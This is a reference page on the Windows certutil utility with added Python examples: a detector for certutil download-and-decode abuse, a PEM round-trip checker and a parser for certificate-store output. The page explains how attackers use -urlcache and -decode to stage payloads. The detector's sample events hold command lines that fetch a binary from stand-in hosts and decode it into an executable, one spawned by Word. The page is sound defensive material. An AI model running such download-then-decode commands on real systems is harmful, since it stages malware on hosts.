CERTUTIL - CMD


Overview

certutil is a command-line utility that ships with every Windows installation (as %SystemRoot%\System32\certutil.exe) and is used to manage certificates, Certificate Revocation Lists (CRLs), and Certificate Trust Lists (CTLs). It can display, verify, import, export, encode and decode certificates and related data, query a Certification Authority, and troubleshoot certificate problems. Because it is present by default and can also fetch URLs and decode Base64 files, it is one of the Windows binaries most frequently abused by attackers for staging payloads, so its use outside PKI administration deserves scrutiny.

Syntax

certutil [Options] [Command] [Command_Arguments]
  • Options: Modify how certutil behaves (e.g., -config specifies the CA configuration string; -user selects the current user's stores instead of the machine stores).
  • Command: The verb you want certutil to perform, such as -dump, -encode, or -restore. One command is given per invocation.
  • Command_Arguments: Additional arguments specific to the chosen command.

Options/Flags

  • -dump: Displays detailed information about a certificate, CRL, CTL, request or other ASN.1-encoded file.
  • -encode: Encodes a file to Base64 with BEGIN/END CERTIFICATE headers. The input does not have to be a certificate; any file is accepted.
  • -decode: Decodes a Base64-encoded file back to binary. Armored (PEM) and bare Base64 are both accepted, and again any content is accepted, which is why -decode is a common way for malware to reconstitute a payload that was dropped as text.
  • -urlcache: Displays or deletes URL cache entries. Combined with -f (and usually -split) it fetches the URL and writes the content to a local file, which turns certutil into a file downloader; downloads through -urlcache are a well-known attacker technique and should be monitored.
  • -config: Specifies the configuration string (CAHostName\CAName) of the target Certification Authority.
  • -v: Verbose mode, prints detailed output for the operation being performed.
  • -silent: Suppresses interactive prompts (useful in scripts).
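Because -urlcache -f and -decode turn certutil into a downloader and a decoder, the command lines a practitioner most wants to catch are those two verbs, especially when a download is then decoded, or when certutil is spawned by an Office application. The Python below is an added example, not part of the original page and not code from certutil or Microsoft: it runs that logic over a few constructed process-creation events (fictitious pids and users, a TEST-NET address) and correlates a -decode whose input file was fetched by an earlier -urlcache download. The event field names are assumptions; map them to your own source (Sysmon Event ID 1 or Security 4688 with command-line auditing).

```python
import ntpath
import shlex
from dataclasses import dataclass

# Parent processes from which a certutil download is almost never legitimate.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}

# Constructed process-creation events (fictitious pids/users, TEST-NET address);
# the field names are an assumption, map them to Sysmon EID 1 / Security 4688 fields.
SAMPLE_EVENTS = [
    {"pid": 4120, "user": "CORP\\jdoe", "parent": "cmd.exe",
     "cmd": "certutil -urlcache -split -f http://198.51.100.7/update.bin C:\\Users\\Public\\update.bin"},
    {"pid": 4133, "user": "CORP\\jdoe", "parent": "cmd.exe",
     "cmd": "certutil -decode C:\\Users\\Public\\update.bin C:\\Users\\Public\\update.exe"},
    {"pid": 5001, "user": "CORP\\pki-admin", "parent": "cmd.exe",
     "cmd": "certutil -dump C:\\certs\\webserver.cer"},
    {"pid": 5207, "user": "CORP\\jdoe", "parent": "WINWORD.EXE",
     "cmd": "CertUtil.exe /URLCache /f https://example.net/x.txt %TEMP%\\x.txt"},
]


@dataclass
class Finding:
    pid: int
    technique: str   # "download" or "decode"
    severity: str
    reason: str
    path: str        # destination file (download) or input file (decode)


def parse_certutil(cmd):
    """Return (switches, positionals) for a certutil command line, or None when the
    image is not certutil. Switches are lowercased and stripped of their '-' or '/'
    prefix, since certutil accepts either; quoting is handled Windows-style."""
    try:
        tokens = shlex.split(cmd, posix=False)
    except ValueError:
        return None
    if not tokens:
        return None
    image = ntpath.basename(tokens[0].strip('"')).lower()
    if image not in ("certutil", "certutil.exe"):
        return None
    switches, positionals = [], []
    for tok in tokens[1:]:
        if len(tok) > 1 and tok[0] in "-/":
            switches.append(tok[1:].lower())
        else:
            positionals.append(tok.strip('"'))
    return switches, positionals


def analyze(events):
    """Flag certutil downloads and decodes; link a decode to the download that
    produced its input file so the two-step staging pattern surfaces as one story."""
    findings = []
    downloaded = {}                      # normalized destination path -> pid of the download
    for ev in events:
        parsed = parse_certutil(ev["cmd"])
        if parsed is None:
            continue
        switches, positionals = parsed
        parent = ev["parent"].lower()
        if "urlcache" in switches and "f" in switches:
            url = next((p for p in positionals if p.lower().startswith(("http://", "https://"))), "<no url>")
            dest = positionals[-1] if len(positionals) >= 2 else ""
            severity, reason = "high", f"file download via -urlcache -f from {url}"
            if parent in OFFICE_PARENTS:
                severity, reason = "critical", reason + f"; spawned by {parent}"
            findings.append(Finding(ev["pid"], "download", severity, reason, dest))
            if dest:
                downloaded[ntpath.normcase(dest)] = ev["pid"]
        elif "decode" in switches or "decodehex" in switches:
            src = positionals[0] if positionals else ""
            severity, reason = "medium", "Base64/hex decode to disk"
            origin = downloaded.get(ntpath.normcase(src))
            if origin is not None:
                severity = "high"
                reason += f" of a file fetched by pid {origin} (download-then-decode chain)"
            findings.append(Finding(ev["pid"], "decode", severity, reason, src))
    return findings


if __name__ == "__main__":
    for f in analyze(SAMPLE_EVENTS):
        print(f"[{f.severity.upper():8}] pid {f.pid} {f.technique}: {f.reason} -> {f.path}")
```

In a real deployment the download rule needs an allowlist (PKI administrators do fetch CRLs with -urlcache), and the decode rule is best paired with a check on the output file's extension or header; the point here is the correlation across two events, which a single-line signature misses.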

Examples

  1. Displaying Certificate Information:
certutil -dump myCertificate.cer

This command prints detailed information about the certificate myCertificate.cer (subject, issuer, validity period, extensions, thumbprint).

  2. Encoding and Decoding a Certificate:
certutil -encode input.cer encoded.txt
certutil -decode encoded.txt output.cer

The first command encodes the certificate file to a Base64 text file with BEGIN/END CERTIFICATE headers, while the second decodes it back to the original binary (DER) form.
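To make the encoding concrete, the following Python is an added example (not from the page and not Microsoft's code): it reproduces what -encode writes (standard Base64, 64 characters per line, CRLF line endings, BEGIN/END CERTIFICATE armor) and what -decode accepts (armored or bare Base64), runs a round trip on a constructed DER-like sample, and adds the sanity check a defender wants after a decode: a certificate is a single DER SEQUENCE whose declared length equals the file size, and an executable smuggled through -decode is not.

```python
import base64
import binascii
import re

PEM_HEADER = "-----BEGIN CERTIFICATE-----"
PEM_FOOTER = "-----END CERTIFICATE-----"

# Constructed stand-in for a DER certificate: a SEQUENCE (tag 0x30) with a
# two-byte length field (0x82 0x01 0x00 = 256) followed by 256 payload bytes.
SAMPLE_DER = b"\x30\x82\x01\x00" + bytes(range(256))


def encode_like_certutil(der: bytes) -> str:
    """Armor binary data the way certutil -encode does: standard Base64,
    64 characters per line, CRLF line endings, BEGIN/END CERTIFICATE headers."""
    b64 = base64.b64encode(der).decode("ascii")
    lines = [b64[i:i + 64] for i in range(0, len(b64), 64)]
    return "\r\n".join([PEM_HEADER, *lines, PEM_FOOTER]) + "\r\n"


def decode_like_certutil(text: str) -> bytes:
    """Recover the binary from armored or bare Base64 text, as certutil -decode
    accepts either; stray whitespace and CR/LF are ignored, bad input is rejected."""
    body = re.sub(r"-----(BEGIN|END)[^-]*-----", "", text)
    body = re.sub(r"\s+", "", body)
    try:
        return base64.b64decode(body, validate=True)
    except binascii.Error as exc:
        raise ValueError(f"input is not valid Base64: {exc}") from None


def looks_like_der_certificate(data: bytes) -> bool:
    """Cheap sanity check on a decoded blob: an X.509 certificate is one DER
    SEQUENCE whose encoded length matches the file size exactly. A PE file,
    script or archive that was reconstituted with -decode fails this check."""
    if len(data) < 4 or data[0] != 0x30:
        return False
    first = data[1]
    if first < 0x80:                      # short-form length
        total = 2 + first
    else:                                 # long-form: low 7 bits = number of length bytes
        n = first & 0x7F
        if n == 0 or n > 4 or len(data) < 2 + n:
            return False
        total = 2 + n + int.from_bytes(data[2:2 + n], "big")
    return total == len(data)


def round_trip(der: bytes) -> bool:
    """encode -> decode must give back the identical bytes."""
    return decode_like_certutil(encode_like_certutil(der)) == der


if __name__ == "__main__":
    pem = encode_like_certutil(SAMPLE_DER)
    print(pem.splitlines()[0], "...", pem.splitlines()[-1])
    print("round trip ok:", round_trip(SAMPLE_DER))
    print("decoded blob is a DER certificate:", looks_like_der_certificate(SAMPLE_DER))
    print("PE header is not:", looks_like_der_certificate(b"MZ\x90\x00" + bytes(60)))
```

The length check is deliberately shallow (it does not parse the TBSCertificate); it is enough to tell a certificate from a dropped executable on the incident-response side, and a full parse is a job for a library.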

  3. Verifying a Certificate:
certutil -verify myCertificate.cer

This command builds the certificate chain for myCertificate.cer against the local trust stores and reports chain, validity-period and revocation problems; add -urlfetch to retrieve AIA and CRL information from the network instead of relying on what is already cached.

Common Issues

  • Permission Errors: Commands that modify the LocalMachine stores or write to a CA require administrative rights. Add -user to operate on the current user's stores, which needs no elevation.
  • Syntax Errors: There are many commands and options, and a misspelled or unsupported combination produces an error. Run certutil -? for the list of commands and certutil -<command> -? for the exact usage of one command.
  • Compatibility Issues: Certificates from non-Windows systems usually arrive PEM (Base64) encoded; certutil reads both PEM and DER, and -decode converts PEM to DER when a tool insists on binary input. Make sure the format is supported and correctly specified before blaming the certificate.

Integration

You can combine certutil with other CMD utilities like findstr to search for specific certificate details:

certutil -store my | findstr /C:"CN=example.com"

This lists the LocalMachine personal (MY) store and prints every line containing the literal string CN=example.com. Note that findstr matches anywhere in the output, so Issuer lines and any subject that merely contains that string (for example CN=example.com.internal) match too; the Subject: line is the one that identifies the certificate. Use certutil -user -store my for the current user's store.
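The following Python is an added example, not something the page or certutil provides: it parses a constructed sample written in the layout certutil -store prints (not captured from a real host) into one record per certificate, matches the Subject CN exactly, and reports the SHA-1 thumbprint, the expiry and whether a private key is present, which the findstr one-liner cannot do. It also shows how many lines the plain substring match would have returned. The date parsing assumes the US short date format; certutil prints dates in the host's locale.

```python
import re
from datetime import datetime

# Constructed sample in the layout certutil -store prints; not captured from a real host.
SAMPLE_STORE_OUTPUT = """\
my "Personal"
================ Certificate 0 ================
Serial Number: 1f00000003a1b2c3d4e5f60000000000003
Issuer: CN=Corp Issuing CA, DC=corp, DC=example
 NotBefore: 3/1/2023 9:00 AM
 NotAfter: 3/1/2024 9:00 AM
Subject: CN=example.com, OU=Web, O=Example Corp
Cert Hash(sha1): 7c3d9a1b2e4f5061728394a5b6c7d8e9f0a1b2c3
  Key Container = te-WebServer-4f2a1c
  Provider = Microsoft RSA SChannel Cryptographic Provider
Private key is NOT exportable
================ Certificate 1 ================
Serial Number: 1f00000004c9d8e7f6a5b4000000000004
Issuer: CN=Corp Issuing CA, DC=corp, DC=example
 NotBefore: 1/15/2024 10:30 AM
 NotAfter: 1/15/2025 10:30 AM
Subject: CN=example.com, OU=Web, O=Example Corp
Cert Hash(sha1): 0a1b2c3d4e5f60718293a4b5c6d7e8f9a0b1c2d3
  Key Container = te-WebServer-9b8c7d
  Provider = Microsoft RSA SChannel Cryptographic Provider
Private key is NOT exportable
================ Certificate 2 ================
Serial Number: 5e00000001aa00000000000000000000001
Issuer: CN=example.com, OU=Web, O=Example Corp
 NotBefore: 6/1/2024 8:00 AM
 NotAfter: 6/1/2026 8:00 AM
Subject: CN=api.example.com.internal, O=Example Corp
Cert Hash(sha1): 11223344556677889900aabbccddeeff00112233
CertUtil: -store command completed successfully.
"""

RECORD_SPLIT = re.compile(r"^=+ Certificate \d+ =+\s*$", re.MULTILINE)
FIELD = re.compile(
    r"^\s*(Serial Number|Issuer|NotBefore|NotAfter|Subject|Cert Hash\(sha1\))\s*:\s*(.*?)\s*$",
    re.MULTILINE,
)


def parse_store_output(text):
    """Split certutil -store output into one dict per certificate record."""
    records = []
    for chunk in RECORD_SPLIT.split(text)[1:]:       # [0] is the store-name banner
        rec = dict(FIELD.findall(chunk))
        rec["has_private_key"] = "Key Container" in chunk
        records.append(rec)
    return records


def subject_cn(subject):
    """Extract the CN attribute from a 'CN=..., OU=..., O=...' distinguished name."""
    m = re.search(r"(?:^|,\s*)CN=([^,]+)", subject)
    return m.group(1).strip() if m else ""


def find_by_cn(records, cn):
    """Exact, case-insensitive match on the Subject CN only (Issuer lines do not count)."""
    return [r for r in records if subject_cn(r.get("Subject", "")).lower() == cn.lower()]


def findstr_like(text, needle):
    """What findstr /C:"..." returns: every line containing the literal substring."""
    return [line for line in text.splitlines() if needle in line]


def parse_certutil_date(text):
    """certutil prints dates in the host locale; this assumes the US short format."""
    return datetime.strptime(text, "%m/%d/%Y %I:%M %p")


def is_expired(record, now):
    """now may be a datetime or a string in the same M/D/YYYY H:MM AM format."""
    if isinstance(now, str):
        now = parse_certutil_date(now)
    return parse_certutil_date(record["NotAfter"]) < now


if __name__ == "__main__":
    records = parse_store_output(SAMPLE_STORE_OUTPUT)
    print("findstr would return", len(findstr_like(SAMPLE_STORE_OUTPUT, "CN=example.com")), "lines")
    for r in find_by_cn(records, "example.com"):
        print(r["Cert Hash(sha1)"], "expires", r["NotAfter"],
              "private key:", r["has_private_key"])
```

On a real host feed the parser with the captured output (for example `certutil -store my > store.txt`) and it will pick out the two certificates for example.com by thumbprint, so the expired one can be removed with certutil -delstore my <thumbprint> without guessing which of the matching lines belonged to which certificate.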

Related tools:

  • openssl: Often used alongside or as an alternative to certutil for certificate management on Windows and other operating systems.
  • makecert: Deprecated Windows SDK tool for generating test certificates; New-SelfSignedCertificate replaces it.
  • powershell: PowerShell exposes the same stores through the Cert: drive (e.g., Get-ChildItem Cert:\LocalMachine\My) and provides cmdlets like New-SelfSignedCertificate for similar tasks.

For more detailed information and updates, refer to the official Certutil documentation.